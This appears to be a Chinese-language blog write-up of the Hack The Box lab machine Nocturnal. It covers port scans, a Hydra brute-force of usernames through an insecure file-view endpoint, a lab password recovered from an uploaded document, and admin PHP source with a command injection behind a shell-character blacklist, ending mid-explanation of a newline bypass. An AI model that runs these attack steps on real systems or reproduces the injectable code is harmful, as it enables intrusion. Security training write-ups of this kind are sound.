{"id":248,"date":"2025-04-16T21:41:50","date_gmt":"2025-04-16T13:41:50","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=248"},"modified":"2026-01-29T16:16:16","modified_gmt":"2026-01-29T08:16:16","slug":"248","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2025\/04\/16\/248\/","title":{"rendered":"HTB\u9776\u673a Nocturnal \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"
\n

\u76ee\u6807\u4fe1\u606f<\/h1>\n

IP\u5730\u5740\uff1a<\/strong>10.10.11.64<\/strong><\/code><\/p><\/blockquote>\n

\n

\u4fe1\u606f\u6536\u96c6<\/h1>\n

ICMP\u68c0\u6d4b<\/h2>\n
PING 10.10.11.64 (10.10.11.64) 56(84) bytes of data.\n64 bytes from 10.10.11.64: icmp_seq=1 ttl=63 time=433 ms\n64 bytes from 10.10.11.64: icmp_seq=2 ttl=63 time=456 ms\n64 bytes from 10.10.11.64: icmp_seq=3 ttl=63 time=478 ms\n64 bytes from 10.10.11.64: icmp_seq=4 ttl=63 time=400 ms\n\n--- 10.10.11.64 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3002ms\nrtt min\/avg\/max\/mdev = 400.007\/441.891\/478.220\/28.962 ms<\/code><\/pre>\n
\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u7f51\u7edc\u8fde\u63a5\u6b63\u5e38\u3002<\/p>\n
\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n
# Nmap 7.95 scan initiated Sun Apr 13 07:46:35 2025 as: \/usr\/lib\/nmap\/nmap -sF -p- --min-rate 3000 -oN .\/fin_report.txt 10.10.11.64\nNmap scan report for 10.10.11.64\nHost is up (0.34s latency).\nAll 65535 scanned ports on 10.10.11.64 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Sun Apr 13 07:47:21 2025 -- 1 IP address (1 host up) scanned in 46.29 seconds<\/code><\/pre>\n
\u65e0\u6cd5\u63a2\u6d4b\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n
\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n
TCP<\/strong><\/code>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.95 scan initiated Sun Apr 13 07:53:18 2025 as: \/usr\/lib\/nmap\/nmap -sT -sV -A -p- --min-rate 3000 -oN .\/tcp_report.txt 10.10.11.64\nWarning: 10.10.11.64 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.64\nHost is up (0.26s latency).\nNot shown: 65525 closed tcp ports (conn-refused)\nPORT      STATE    SERVICE VERSION\n22\/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)\n|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)\n|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)\n80\/tcp    open     http    nginx 1.18.0 (Ubuntu)\n|_http-server-header: nginx\/1.18.0 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/nocturnal.htb\/\n6811\/tcp  filtered unknown\n16965\/tcp filtered unknown\n25054\/tcp filtered unknown\n45964\/tcp filtered unknown\n49883\/tcp filtered unknown\n52983\/tcp filtered unknown\n65008\/tcp filtered unknown\n65532\/tcp filtered unknown\nDevice type: general purpose\nRunning: Linux 5.X\nOS CPE: cpe:\/o:linux:linux_kernel:5.0\nOS details: Linux 5.0, Linux 5.0 - 5.14\nNetwork Distance: 2 hops\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   291.51 ms 10.10.14.1\n2   291.84 ms 10.10.11.64\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Apr 13 07:54:17 2025 -- 1 IP address (1 host up) scanned in 59.42 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
# Nmap 7.95 scan initiated Sun Apr 13 07:56:09 2025 as: \/usr\/lib\/nmap\/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.10.11.64\nWarning: 10.10.11.64 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.11.64\nHost is up (0.30s latency).\nAll 65535 scanned ports on 10.10.11.64 are in ignored states.\nNot shown: 65294 open|filtered udp ports (no-response), 241 closed udp ports (port-unreach)\n\n# Nmap done at Sun Apr 13 08:00:13 2025 -- 1 IP address (1 host up) scanned in 243.23 seconds<\/code><\/pre>\n
UDP<\/strong><\/code>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n
\uff08\u65e0\uff09<\/code><\/pre>\n
\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u4e3aUbuntu Linux<\/code>\uff0c\u5f00\u653e\u4e86SSH<\/code>\u548cNginx Web<\/code>\u670d\u52a1\uff0cWeb<\/code>\u670d\u52a1\u4e3b\u57df\u540d\u4e3anocturnal.htb<\/code>\u3002<\/p>\n
\n
\u670d\u52a1\u63a2\u6d4b<\/h1>\n
SSH\u670d\u52a1\uff0822\u7aef\u53e3\uff09<\/h2>\n
\u7aef\u53e3Banner<\/code>\uff1a<\/p>\n
\u250c\u2500\u2500(root\u327fmisaka19008)-[\/home\/megumin\/Documents\/pentest_notes\/nocturnal]\n\u2514\u2500# nc -nv 10.10.11.64 22                                     \n(UNKNOWN) [10.10.11.64] 22 (ssh) open\nSSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12<\/code><\/pre>\n
Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n
\u6253\u5f00\u7f51\u5740\uff1ahttp:\/\/nocturnal.htb\/<\/code><\/p>\n
\"\"<\/p>\n
\u6839\u636e\u7f51\u9875\u4e0a\u7684\u63cf\u8ff0\uff0c\u53d1\u73b0\u8be5\u7ad9\u70b9\u4f3c\u4e4e\u4e3a\u4e00\u4e2a\u7b80\u5355\u7684\u6587\u4ef6\u4e0a\u4f20\u4e0e\u7ba1\u7406\u7cfb\u7edf\u3002\u76f4\u63a5\u70b9\u51fbregister<\/code>\u94fe\u63a5\uff0c\u8df3\u8f6c\u5230\/register.php<\/code>\u6ce8\u518c\u4e00\u4e2a\u540d\u4e3amisaka19008<\/code>\u7684\u65b0\u7528\u6237\uff1a<\/p>\n
\"\"<\/p>\n
\u968f\u540e\u9875\u9762\u8df3\u8f6c\u81f3\/login.php<\/code>\uff0c\u8f93\u5165\u7528\u6237\u5bc6\u7801\u767b\u5f55\uff1a<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u8bbf\u95ee\u6587\u4ef6\u4e0a\u4f20\u9762\u677f\u3002\u63a5\u4e0b\u6765\uff0c\u76f4\u63a5\u5c1d\u8bd5\u65b0\u5efa\u4e00\u4e2aTXT<\/code>\u6587\u4ef6\u8fdb\u884c\u4e0a\u4f20\u64cd\u4f5c\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u6587\u4ef6\u4e0a\u4f20\u63a5\u53e3\u5bf9\u4e0a\u4f20\u6587\u4ef6\u7684\u540e\u7f00\u540d\u4f7f\u7528\u4e86\u767d\u540d\u5355\u8fc7\u6ee4\u673a\u5236\uff0c\u8be5\u63a5\u53e3\u53ea\u5141\u8bb8\u4e0a\u4f20\u5982\u4e0b\u540e\u7f00\u540d\u6587\u4ef6\uff1apdf<\/code>\u3001doc<\/code>\u3001docx<\/code>\u3001xls<\/code>\u3001xlsx<\/code>\u548codt<\/code>\u3002<\/p>\n
\u76f4\u63a5\u5c06test.txt<\/code>\u6539\u540d\u4e3atest.xls<\/code>\u4e0a\u4f20\uff1a<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u4e0a\u4f20\u6587\u4ef6\uff0c\u968f\u540e\u53d1\u73b0\u9875\u9762\u8fd4\u56de\u4e86test.xls<\/code>\u6587\u4ef6\u7684\u4e0b\u8f7d\u94fe\u63a5\uff1a<\/p>\n
http:\/\/nocturnal.htb\/view.php?username=misaka19008&file=test.xls<\/code><\/pre>\n
\u8bbf\u95ee\u8be5\u94fe\u63a5\u540e\uff0cview.php<\/code>\u8fd4\u56de\u4e86\u4e0a\u4f20\u7684\u6587\u4ef6\u5185\u5bb9\u3002<\/p>\n
\u4f46\u4ee4\u4eba\u5728\u610f\u7684\u4e00\u4ef6\u4e8b\u662f\uff0c\u6587\u4ef6\u4e0b\u8f7d\u63a5\u53e3view.php<\/code>\u5728\u6267\u884c\u8fd4\u56de\u6587\u4ef6\u5185\u5bb9\u64cd\u4f5c\u524d\uff0c\u5fc5\u987b\u63a5\u6536\u7531\u7528\u6237\u63d0\u4f9b\u7684username<\/code>\u7528\u6237\u540d\u53c2\u6570\u548cfile<\/code>\u6587\u4ef6\u540d\u53c2\u6570\uff0c\u624d\u80fd\u6267\u884c\u540e\u7eed\u7684\u4efb\u52a1\uff1b\u4f46\u6b63\u5e38\u60c5\u51b5\u4e0b\uff0c\u7f51\u7ad9\u5982\u679c\u60f3\u8981\u5224\u65ad\u5f53\u524d\u8bbf\u95ee\u8005\u7684\u7528\u6237\u8eab\u4efd\uff0c\u53ea\u9700\u8981\u6839\u636e\u5ba2\u6237\u7aef\u6d4f\u89c8\u5668\u4f20\u8f93\u7684Cookie<\/code>\u4fe1\u606f\uff08\u901a\u5e38\u4e3aPHPSESSID<\/code>\uff09\u67e5\u627e\u670d\u52a1\u5668\u4e0a\u5bf9\u5e94\u7684Session<\/code>\u6587\u4ef6\uff0c\u968f\u540e\u8bfb\u53d6Session<\/code>\u6570\u7ec4\u4e2d\u7531\u767b\u5f55\u7a0b\u5e8f\u4fdd\u5b58\u7684\u7528\u6237\u540d\u5373\u53ef\u3002\u800c\u5728<\/span><\/strong>view.php<\/strong><\/code>\u4e2d\uff0c\u5373\u4f7f\u7528\u6237\u5df2\u7ecf\u767b\u5f55\uff0c\u5224\u65ad\u7528\u6237\u8eab\u4efd\u8fd8\u9700\u8981\u7531<\/span><\/strong>HTTP GET<\/code>\u53c2\u6570\u4f20\u5165\u7528\u6237\u540d\uff0c\u8fd9\u610f\u5473\u7740\u7ad9\u70b9\u6587\u4ef6\u4e0b\u8f7d\u63a5\u53e3\u5f88\u6709\u53ef\u80fd\u5b58\u5728\u5782\u76f4\u8d8a\u6743\u6f0f\u6d1e\u3002<\/span><\/strong><\/p>\n
\u76f4\u63a5\u91cd\u65b0\u6ce8\u518c\u4e00\u4e2a\u65b0\u7528\u6237misaka20001<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u968f\u540e\u9000\u51fa\u767b\u5f55\uff0c\u91cd\u65b0\u4ee5misaka19008<\/code>\u7528\u6237\u8eab\u4efd\u767b\u5f55\u7ad9\u70b9\uff0c\u5e76\u8bbf\u95eeview.php<\/code>\u6587\u4ef6\u4e0b\u8f7d\u63a5\u53e3\uff0c\u4f46\u5c06username<\/code>\u53c2\u6570\u5185\u5bb9\u66ff\u6362\u4e3amisaka20001<\/code>\uff0cfile<\/code>\u53c2\u6570\u5185\u5bb9\u4fdd\u6301test.xls<\/code>\u4e0d\u53d8\uff1ahttp:\/\/nocturnal.htb\/view.php?username=misaka20001&file=test.xls<\/code><\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u9875\u9762\u8fd4\u56de\u4e86File does not exist.<\/code>\u5b57\u6837\uff0c\u5c1d\u8bd5\u5c06username<\/code>\u53c2\u6570\u6539\u6210\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u7528\u6237\u540dmisaka9982<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u9875\u9762\u76f4\u63a5\u8fd4\u56de\u4e86User not found.<\/code>\u5b57\u6837\u3002<\/p>\n
\u6210\u529f\u53d1\u73b0\u7ad9\u70b9\u6587\u4ef6\u4e0b\u8f7d\u63a5\u53e3\u5b58\u5728\u5782\u76f4\u8d8a\u6743\u6f0f\u6d1e\uff01<\/strong><\/p>\n
\n
\u6e17\u900f\u6d4b\u8bd5<\/h1>\n
\u5229\u7528\u5782\u76f4\u8d8a\u6743\u6f0f\u6d1e\u7206\u7834\u7528\u6237\u540d<\/h2>\n
\u5728\u4e4b\u524d\u7684\u670d\u52a1\u63a2\u6d4b\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u5df2\u7ecf\u6210\u529f\u53d1\u73b0\u4e86\u6587\u4ef6\u4e0b\u8f7d\u63a5\u53e3view.php<\/code>\u7684\u5782\u76f4\u8d8a\u6743\u6f0f\u6d1e\uff0c\u4ee5\u53ca\u5f53username<\/code>\u53c2\u6570\u4e3a\u5b58\u5728\u7684\u7528\u6237\u540d\u65f6\uff0c\u9875\u9762\u4f1a\u8fd4\u56deAvailable files for download<\/code>\u5b57\u6837\u7684\u4e8b\u5b9e\u3002\u56e0\u6b64\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u4ee5\u4e0a\u7279\u6027\u8fdb\u884c\u7528\u6237\u540d\u7206\u7834\u3002<\/p>\n
\u9996\u5148\u67e5\u770bview.php<\/code>\u7528\u6237\u540d\u53c2\u6570\u4e3a\u5b58\u5728\u7528\u6237\u540d\u65f6\u7684\u9875\u9762\u6e90\u4ee3\u7801\uff1a<\/p>\n
<div class='error'>File does not exist.<\/div><h2>Available files for download:<\/h2><ul><\/ul><\/code><\/pre>\n
\u53d1\u73b0\u5355\u8bcdAvailable<\/code>\u786e\u5b9e\u5b58\u5728\u4e8e\u9875\u9762\u660e\u6587\u6e90\u4ee3\u7801\u4e2d\uff0c\u6709\u4e14\u53ea\u6709\u4e00\u4e2a\uff0c\u53ef\u4ee5\u7528\u4f5cHydra<\/code>\u6b63\u786e\u7ed3\u679c\u7684\u6807\u8bc6\u8bcd\u3002<\/p>\n
\u63a5\u4e0b\u6765\u83b7\u53d6\u5f53\u524dCookie<\/code>\u5185\u5bb9\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0Cookie<\/code>\u4e3a\uff1aPHPSESSID=468aivq3ijt6g4rmao9vni106k<\/code><\/p>\n
\u76f4\u63a5\u4f7f\u7528Hydra<\/code>\u5de5\u5177\uff0c\u914d\u5408\u7528\u6237\u540d\u5b57\u5178xato-net-10-million-usernames-dup.txt<\/code>\u7206\u7834view.php<\/code>\u7684\u7528\u6237\u540d\u53c2\u6570\uff1a<\/p>\n
hydra -L \/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames-dup.txt -p test.xls -t 60 nocturnal.htb http-get-form \"\/view.php:username=^USER^&file=^PASS^:H=Cookie:PHPSESSID=468aivq3ijt6g4rmao9vni106k:S=Available\"<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b04<\/code>\u4e2a\u7528\u6237\u540d\uff1aadmin<\/code>\u3001amanda<\/code>\u3001toto<\/code>\u548ctobias<\/code>\u3002<\/p>\n
\u5c1d\u8bd5\u5c06username<\/code>\u53c2\u6570\u8bbe\u7f6e\u4e3aamanda<\/code>\uff0c\u83b7\u53d6\u8be5\u7528\u6237\u7684\u4e0a\u4f20\u6587\u4ef6\u5217\u8868\uff1ahttp:\/\/nocturnal.htb\/view.php?username=amanda&file=test.xls<\/code><\/p>\n
\"\"<\/p>\n
ODT\u5f52\u6863\u6587\u4ef6\u5185\u53d1\u73b0\u7528\u6237\u51ed\u636e<\/h2>\n
\u83b7\u53d6amanda<\/code>\u7528\u6237\u6587\u4ef6\u5217\u8868\u540e\uff0c\u6211\u4eec\u5c1d\u8bd5\u4e0b\u8f7dprivacy.odt<\/code>\u6587\u4ef6\uff0c\u67e5\u770b\u5176\u5185\u5bb9\uff1a<\/p>\n
\"\"<\/p>\n
\u7ecf\u8fc7\u7ffb\u770b\u540e\uff0c\u5728content.xml<\/code>\u6587\u4ef6\u5185\u53d1\u73b0\u7528\u6237\u51ed\u636e\uff1a<\/p>\n
<text:p text:style-name=\"P1\">Dear <text:span text:style-name=\"T1\">Amanda<\/text:span>,<\/text:p><text:p text:style-name=\"P1\">Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.<\/text:p><text:p text:style-name=\"P1\">The file has been created and provided by Nocturnal&apos;s IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.<\/text:p><text:p text:style-name=\"P1\">Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.<\/text:p><\/code><\/pre>\n
\u5c1d\u8bd5\u4ee5\u5982\u4e0b\u7528\u6237\u51ed\u636e\u767b\u5f55\u7f51\u7ad9\uff1a<\/p>\n
    \n
  • \u7528\u6237\u540d\uff1aamanda<\/code><\/li>\n
  • \u5bc6\u7801\uff1aarHkG7HAI68X8s1J<\/code><\/li>\n<\/ul>\n
    \"\"<\/p>\n
    \u6210\u529f\u767b\u5f55\u7ba1\u7406\u5458\u540e\u53f0\uff01<\/p>\n
    \u7ad9\u70b9\u4ee3\u7801\u5ba1\u8ba1\u53d1\u73b0\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e<\/h2>\n
    \u767b\u5f55\u7ba1\u7406\u5458\u540e\u53f0admin.php<\/code>\u540e\uff0c\u53d1\u73b0\u6211\u4eec\u53ef\u4ee5\u67e5\u770b\u7f51\u7ad9PHP<\/code>\u7a0b\u5e8f\u7684\u6e90\u4ee3\u7801\uff0c\u5e76\u4e14\u5728\u9875\u9762\u6700\u5e95\u90e8\uff0c\u6709\u4e00\u4e2a\u5907\u4efd\u521b\u5efa\u5de5\u5177\uff0c\u8fd8\u9700\u8981\u7ba1\u7406\u5458\u521b\u5efa\u5907\u4efd\u6587\u4ef6\u5bc6\u7801\uff1a<\/p>\n
    \"\"<\/p>\n
    \u76f4\u63a5\u67e5\u770badmin.php<\/code>\u7684\u6e90\u4ee3\u7801\uff1a<\/p>\n
    \n\n<?php\nsession_start();\n\nif (!isset($_SESSION['user_id']) || ($_SESSION['username'] !== 'admin' && $_SESSION['username'] !== 'amanda')) {\n    header('Location: login.php');\n    exit();\n}\n\nfunction sanitizeFilePath($filePath) {\n    return basename($filePath); \/\/ Only gets the base name of the file\n}\n\n\/\/ List only PHP files in a directory\nfunction listPhpFiles($dir) {\n    $files = array_diff(scandir($dir), ['.', '..']);\n    echo \"<ul class='file-list'>\";\n    foreach ($files as $file) {\n        $sanitizedFile = sanitizeFilePath($file);\n        if (is_dir($dir . '\/' . $sanitizedFile)) {\n            \/\/ Recursively call to list files inside directories\n            echo \"<li class='folder'> <strong>\" . htmlspecialchars($sanitizedFile) . \"<\/strong>\";\n            echo \"<ul>\";\n            listPhpFiles($dir . '\/' . $sanitizedFile);\n            echo \"<\/ul><\/li>\";\n        } else if (pathinfo($sanitizedFile, PATHINFO_EXTENSION) === 'php') {\n            \/\/ Show only PHP files\n            echo \"<li class='file'> <a href='admin.php?view=\" . urlencode($sanitizedFile) . \"'>\" . htmlspecialchars($sanitizedFile) . \"<\/a><\/li>\";\n        }\n    }\n    echo \"<\/ul>\";\n}\n\n\/\/ View the content of the PHP file if the 'view' option is passed\nif (isset($_GET['view'])) {\n    $file = sanitizeFilePath($_GET['view']);\n    $filePath = __DIR__ . '\/' . $file;\n    if (file_exists($filePath) && pathinfo($filePath, PATHINFO_EXTENSION) === 'php') {\n        $content = htmlspecialchars(file_get_contents($filePath));\n    } else {\n        $content = \"File not found or invalid path.\";\n    }\n}\n\nfunction cleanEntry($entry) {\n    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];\n\n    foreach ($blacklist_chars as $char) {\n        if (strpos($entry, $char) !== false) {\n            return false; \/\/ Malicious input detected\n        }\n    }\n\n    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');\n}\n\n\n?>\n\n<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n    <meta charset=\"UTF-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n    <title>Admin Panel<\/title>\n    <link href=\"https:\/\/fonts.googleapis.com\/css2?family=Poppins:wght@300;400;600&display=swap\" rel=\"stylesheet\">\n    <style>\n        body {\n            font-family: 'Poppins', sans-serif;\n            background-color: #1a1a1a;\n            margin: 0;\n            padding: 0;\n            color: #ff8c00;\n            display: flex;\n            justify-content: center;\n            align-items: center;\n            min-height: 100vh;\n        }\n\n        .container {\n            background-color: #2c2c2c;\n            width: 90%;\n            max-width: 1000px;\n            padding: 30px;\n            box-shadow: 0 8px 20px rgba(0, 0, 0, 0.5);\n            border-radius: 12px;\n        }\n\n        h1, h2 {\n            color: #ff8c00;\n            font-weight: 600;\n        }\n\n        form {\n            display: flex;\n            flex-direction: column;\n            gap: 15px;\n            margin-bottom: 30px;\n        }\n\n        input[type=\"password\"] {\n            padding: 12px;\n            font-size: 16px;\n            border: 1px solid #555;\n            border-radius: 8px;\n            width: 100%;\n            background-color: #333;\n            color: #ff8c00;\n        }\n\n        button {\n            padding: 12px;\n            font-size: 16px;\n            background-color: #2d72bc;\n            color: white;\n            border: none;\n            border-radius: 8px;\n            cursor: pointer;\n            transition: background-color 0.3s ease;\n        }\n\n        button:hover {\n            background-color: #245a9e;\n        }\n\n        .file-list {\n            list-style: none;\n            padding: 0;\n        }\n\n        .file-list li {\n            background-color: #444;\n            padding: 15px;\n            margin-bottom: 10px;\n            border-radius: 8px;\n            display: flex;\n            align-items: center;\n        }\n\n        .file-list li.folder {\n            background-color: #3b3b3b;\n        }\n\n        .file-list li.file {\n            background-color: #4d4d4d;\n        }\n\n        .file-list li a {\n            color: #ff8c00;\n            text-decoration: none;\n            margin-left: 10px;\n        }\n\n        .file-list li a:hover {\n            text-decoration: underline;\n        }\n\n        pre {\n            background-color: #2d2d2d;\n            color: #eee;\n            padding: 20px;\n            border-radius: 8px;\n            overflow-x: auto;\n            font-family: 'Courier New', Courier, monospace;\n        }\n\n        .message {\n            padding: 15px;\n            border-radius: 8px;\n            margin-top: 15px;\n            background-color: #e7f5e6;\n            color: #2d7b40;\n            font-weight: 500;\n        }\n\n        .error {\n            background-color: #f8d7da;\n            color: #842029;\n        }\n\n        .backup-output {\n            margin-top: 20px;\n            padding: 15px;\n            border: 1px solid #555;\n            border-radius: 8px;\n            background-color: #333;\n            color: #ff8c00;\n        }\n    <\/style>\n<\/head>\n<body>\n    <div class=\"container\">\n        <h1>Admin Panel<\/h1>\n\n        <h2>File Structure (PHP Files Only)<\/h2>\n        <?php listPhpFiles(__DIR__); ?>\n\n        <h2>View File Content<\/h2>\n        <?php if (isset($content)) { ?>\n            <pre><?php echo $content; ?><\/pre>\n        <?php } ?>\n\n        <h2>Create Backup<\/h2>\n        <form method=\"POST\">\n            <label for=\"password\">Enter Password to Protect Backup:<\/label>\n            <input type=\"password\" name=\"password\" required placeholder=\"Enter backup password\">\n            <button type=\"submit\" name=\"backup\">Create Backup<\/button>\n        <\/form>\n\n        <div class=\"backup-output\">\n\n<?php\nif (isset($_POST['backup']) && !empty($_POST['password'])) {\n    $password = cleanEntry($_POST['password']);\n    $backupFile = \"backups\/backup_\" . date('Y-m-d') . \".zip\";\n\n    if ($password === false) {\n        echo \"<div class='error-message'>Error: Try another password.<\/div>\";\n    } else {\n        $logFile = '\/tmp\/backup_' . uniqid() . '.log';\n       \n        $command = \"zip -x '.\/backups\/*' -r -P \" . $password . \" \" . $backupFile . \" .  > \" . $logFile . \" 2>&1 &\";\n        \n        $descriptor_spec = [\n            0 => [\"pipe\", \"r\"], \/\/ stdin\n            1 => [\"file\", $logFile, \"w\"], \/\/ stdout\n            2 => [\"file\", $logFile, \"w\"], \/\/ stderr\n        ];\n\n        $process = proc_open($command, $descriptor_spec, $pipes);\n        if (is_resource($process)) {\n            proc_close($process);\n        }\n\n        sleep(2);\n\n        $logContents = file_get_contents($logFile);\n        if (strpos($logContents, 'zip error') === false) {\n            echo \"<div class='backup-success'>\";\n            echo \"<p>Backup created successfully.<\/p>\";\n            echo \"<a href='\" . htmlspecialchars($backupFile) . \"' class='download-button' download>Download Backup<\/a>\";\n            echo \"<h3>Output:<\/h3><pre>\" . htmlspecialchars($logContents) . \"<\/pre>\";\n            echo \"<\/div>\";\n        } else {\n            echo \"<div class='error-message'>Error creating the backup.<\/div>\";\n        }\n\n        unlink($logFile);\n    }\n}\n?>\n\n\t<\/div>\n        \n        <?php if (isset($backupMessage)) { ?>\n            <div class=\"message\"><?php echo $backupMessage; ?><\/div>\n        <?php } ?>\n    <\/div>\n<\/body>\n<\/html>\n<\/code>\n<\/pre>\n
    \u9605\u8bfbadmin.php<\/code>\u6e90\u4ee3\u7801\uff0c\u6211\u4eec\u53ef\u4ee5\u53d1\u73b0\uff0c\u9875\u9762\u5e95\u90e8\u7684Create Backup<\/code>\u529f\u80fd\u5b9e\u9645\u4e0a\u4e3a\u521b\u5efa\u7ad9\u70b9\u76ee\u5f55\u5907\u4efd\u538b\u7f29\u5305\uff0c\u4f46\u8be5\u529f\u80fd\u5e76\u672a\u4f7f\u7528PHP<\/code>\u7f16\u7a0b\u8bed\u8a00\u7684\u538b\u7f29\u5305\u63d2\u4ef6\u6765\u5b8c\u6210\uff0c\u800c\u662f\u76f4\u63a5\u4f7f\u7528\u4e86proc_open<\/code>\u51fd\u6570\u8c03\u7528\u4e86\u64cd\u4f5c\u7cfb\u7edf\u7684zip<\/code>\u547d\u4ee4\u521b\u5efa\u538b\u7f29\u5305\uff0c\u5e76\u5c06\u7528\u6237\u63a7\u5236\u7684\u5bc6\u7801\u53c2\u6570\u7ecf\u8fc7\u4e00\u4e9b\u6076\u610f\u5b57\u7b26\u68c0\u6d4b\u548c\u8f6c\u4e49\u540e\uff08\u4f7f\u7528cleanEntry()<\/code>\u65b9\u6cd5\uff09\uff0c\u62fc\u63a5\u5230\u4e86\u547d\u4ee4\u4e2d\u3002\uff08\u7b2c211 - 232<\/code>\u884c\uff09
    \n\u9488\u5bf9\u4ee5\u4e0a\u60c5\u51b5\uff0c\u6211\u4eec\u7740\u91cd\u5206\u6790cleanEntry()<\/code>\u65b9\u6cd5\uff0c\u8be5\u65b9\u6cd5\u5728\u6e90\u4ee3\u7801\u7b2c44 - 54<\/code>\u884c\uff1a<\/p>\n
    \nfunction cleanEntry($entry) {\n    $blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];\n\n    foreach ($blacklist_chars as $char) {\n        if (strpos($entry, $char) !== false) {\n            return false; \/\/ Malicious input detected\n        }\n    }\n\n    return htmlspecialchars($entry, ENT_QUOTES, 'UTF-8');\n}\n<\/code><\/pre>\n
    \u53ef\u4ee5\u770b\u5230\uff0c\u8be5\u65b9\u6cd5\u9996\u5148\u68c0\u6d4b\u4f20\u5165\u5b57\u7b26\u4e32\u5185\u662f\u5426\u5b58\u5728\u5982;<\/code>\u3001&<\/code>\u3001|<\/code>\u8fd9\u4e00\u7c7b\u7684\u5371\u9669\u5b57\u7b26\uff0c\u5982\u679c\u5b58\u5728\u5219\u76f4\u63a5\u8fd4\u56defalse<\/code>\u5e76\u9000\u51fa\u6267\u884c\uff0c\u63a5\u7740\u4e3b\u7a0b\u5e8f\u5c31\u4f1a\u62a5\u9519\u8fd4\u56deUse another password<\/code>\u63d0\u793a\uff1b\u5982\u679c\u5371\u9669\u5b57\u7b26\u68c0\u67e5\u901a\u8fc7\uff0c\u7a0b\u5e8f\u5c31\u4f1a\u4f7f\u7528htmlspecialchars()<\/code>\u65b9\u6cd5\uff0c\u5bf9\u5b57\u7b26\u4e32\u5185\u7684\u5355\u53cc\u5f15\u53f7\u8fdb\u884cHTML<\/code>\u7f16\u7801\uff0c\u6700\u540e\u8fd4\u56de\u7ecf\u5904\u7406\u540e\u7684\u5b57\u7b26\u4e32\u3002
    \n\u4f46\u662f\uff0c\u8fd9\u79cd\u8fc7\u6ee4\u65b9\u6cd5\u8fd8\u662f\u5b58\u5728\u6f0f\u6d1e\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528Linux Bash Shell<\/code>\u7684\u5206\u884c\u547d\u4ee4\u8f93\u5165\u529f\u80fd\u8fdb\u884c\u7ed5\u8fc7\u3002\u5728Linux<\/code>\u4e2d\uff0c\u5982\u679c\u7528\u6237\u9700\u8981\u5206\u884c\u8f93\u5165\u8fc7\u957f\u7684\u547d\u4ee4\uff0c\u53ea\u9700\u8981\u4f7f\u7528\u5728\u5355\u884c\u547d\u4ee4\u672b\u5c3e\u6dfb\u52a0\u7a7a\u767d\u5b57\u7b26<\/span><\/strong>\u548c\u53cd\u659c\u6760<\/span>**<\/strong>\uff0c\u6700\u540e\u6309<\/strong>\u56de\u8f66\u952e<\/span>**\uff0c\u5c31\u53ef\u4ee5\u5206\u884c\u8f93\u5165\u8d85\u957f\u547d\u4ee4\u4e86\u3002\u6bd4\u5982\uff0c\u7528\u6237\u60f3\u6267\u884cls -lA \/<\/code>\u547d\u4ee4\uff0c\u5b9e\u9645\u5206\u884c\u8f93\u5165\u5185\u5bb9\u53ef\u4ee5\u4e3a\uff1a<\/p>\n
    \nls  \\\n-lA \n\/<\/code><\/pre>\n
